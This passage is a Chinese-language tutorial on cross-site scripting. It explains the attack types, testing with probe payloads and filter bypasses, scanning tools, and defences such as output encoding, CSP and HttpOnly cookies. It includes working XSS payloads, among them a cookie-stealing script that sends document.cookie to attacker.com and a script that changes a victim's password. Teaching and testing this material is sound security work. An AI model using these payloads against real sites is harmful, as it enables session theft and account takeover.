3.1 反射型（Reflected XSS）#

恶意脚本不在服务器存储，而是通过URL参数传递给服务器，服务器原样把脚本塞回响应页面里。

1
http://victim.com/search?q=<script>alert('XSS')</script>

服务器返回的搜索页里，直接把<script>当成搜索结果的一部分输出了。受害者得点一下这个链接才会中招。通常攻击者会配合短链接、钓鱼邮件、社交工程来诱导点击。

特点：不持久，一次性的，但传播成本极低。

3.2 存储型（Stored XSS）#

恶意脚本被存进服务器数据库，之后任何人访问受影响页面都会中招。这是危害最大的类型。

典型场景：评论区、个人签名、商品评价、论坛帖子。攻击者发一条带<script>的评论，服务器存了，之后每个打开这个页面的用户都会执行那段脚本。

特点：一次注入，长期生效，范围广。

3.3 DOM型（DOM-based XSS）#

脚本不经过服务器，完全在前端JavaScript里动态生成DOM时触发。

1
var name = location.hash.substring(1);
2
document.write("欢迎 " + name);

攻击者构造URL：http://victim.com#<img src=x onerror=alert(1)>，document.write直接把恶意内容写进页面。服务器日志里甚至不会记录这个payload，传统WAF很难拦截。

特点：纯前端漏洞，日志难追踪，防御重心在前端。

5.1 基础试探#

在所有用户能输入的地方（搜索框、评论、URL参数）插入最简单的payload：

1
<script>alert('XSS')</script>

如果浏览器弹窗了，说明存在反射型或存储型XSS。

没弹窗不代表安全。可能有过滤或WAF。试试下面这些变形：

1
<img src=x onerror=alert(1)>
2
<svg onload=alert(1)>
3
<a href="javascript:alert(1)">click</a>
4
<iframe src="javascript:alert(1)">
5
<input onfocus=alert(1) autofocus>
6
<body onload=alert(1)>

5.2 绕过基础过滤#

如果过滤了<script>标签，可以尝试大小写混合：<ScRiPt>alert(1)</sCrIpT>。

如果过滤了alert字符串，可以用编码：<img src=x onerror=eval('al\u0065rt(1)')>。

如果服务器对尖括号做实体编码（<变成<），那反射型可能被防住了，但DOM型XSS仍可能通过innerHTML或document.write触发。检测DOM型需要在浏览器控制台里手动跟踪JS代码。

5.3 利用：窃取Cookie#

最简单的窃取payload：

1
<script>
2
fetch('http://attacker.com/steal?cookie=' + document.cookie);
3
</script>

攻击者服务器端随便写个接收日志的脚本即可。注意：如果Cookie设置了HttpOnly，document.cookie读不到，那这条链就断了——这就是为什么生产环境必须给关键Cookie加HttpOnly。

5.4 利用：配合CSRF修改密码#

如果目标网站修改密码的接口是GET或POST且没有CSRF Token，XSS可以直接触发：

1
<script>
2
fetch('/change_password', {
3
  method: 'POST',
4
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
5
  body: 'new_password=hacked123'
6
});
7
</script>

受害者根本不知道密码已经被改了。

6.1 XSStrike（专门测XSS的工具）#

1
git clone https://github.com/s0md3v/XSStrike
2
cd XSStrike
3
python3 xsstrike.py -u "http://example.com/search?q=test"

XSStrike的特点是会分析后端过滤规则，然后自动生成绕过payload，比直接扔一堆payload更智能。

6.2 Burp Suite#

用Burp Scanner的主动扫描，可以自动检测XSS。Pro版内置了大量XSS payload库。免费版可以用Intruder手动fuzz：

1. 抓一个请求，把参数值设成payload位置
2. 加载一个XSS payload字典（网上能下到几千条的fuzz list）
3. 设置grep匹配规则，比如匹配alert、confirm、prompt等关键词
4. 跑完看响应，哪个payload让关键词出现了，说明可能成功

6.3 OWASP ZAP#

ZAP的主动扫描包含XSS检测模块。使用步骤：

• 配置ZAP作为代理
• 浏览目标网站，让ZAP爬取所有页面和参数
• 右键目标 → Attack → Active Scan
• 扫描完成后，查看警报里的“Cross Site Scripting (Reflected)”和“Cross Site Scripting (Persistent)”

ZAP是免费的，功能接近Burp Pro，但对新手来说界面复杂一些。

6.4 dalfox（快速检测XSS）#

1
go install github.com/hahwul/dalfox/v2@latest
2
dalfox url "http://example.com/search?q=test" --silence

Dalfox速度极快，适合批量扫URL，但不擅长处理需要登录的复杂场景。

7.1 输出编码（Output Encoding）—— 最核心的防御#

根据输出位置的不同，做对应的编码：

在Java Spring里：用HtmlUtils.htmlEscape()。
在PHP里：用htmlspecialchars($string, ENT_QUOTES, 'UTF-8')。
在Python Django里：模板默认自动转义，除非你写了|safe。
在Go的html/template里：自动转义，但注意不要用template.HTML。

7.2 输入验证（白名单优先）#

对用户输入做格式校验，只允许符合预期的字符。

• 邮箱：只允许字母、数字、@、.、-、_
• 手机号：只允许数字和+
• 用户名：只允许字母数字下划线

不要只靠黑名单过滤<script>，总有绕过方法。

7.3 Content Security Policy（CSP）#

CSP是浏览器端的最后一道防线。通过HTTP响应头告诉浏览器：哪些来源的脚本可以执行，哪些不能。

1
Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com

上面的策略只允许执行同源和指定CDN的脚本，任何内联<script>或eval()都会被拦截。即使攻击者注入了<script>alert(1)</script>，浏览器也不会执行。

建议：从只报告不拦截的模式（Content-Security-Policy-Report-Only）开始，等日志里没有误报再切到强制模式。

7.4 设置Cookie的HttpOnly标志#

1
Set-Cookie: sessionId=xxxxx; HttpOnly; Secure; SameSite=Strict

加了HttpOnly后，document.cookie读不到这个Cookie，攻击者窃取会话的难度大增。注意：这只能防XSS窃取Cookie，不防CSRF或别的攻击。

7.5 富文本场景：使用安全的HTML过滤库#

业务真的需要用户提交HTML（比如富文本编辑器），不要自己写正则过滤，直接用成熟的库：

• Java：OWASP Java HTML Sanitizer
• Python：Bleach
• Node.js：sanitize-html
• PHP：HTML Purifier

这些库会解析HTML DOM树，只允许安全的标签和属性（比如<b>、<i>、<p>），删掉onerror、onload等事件属性。

7.6 避免危险的API#

前端代码里少用或不用：

• document.write()
• innerHTML（除非你确定内容是纯文本）
• eval()
• setTimeout() / setInterval() 接收字符串参数

优先使用textContent或innerText替代innerHTML。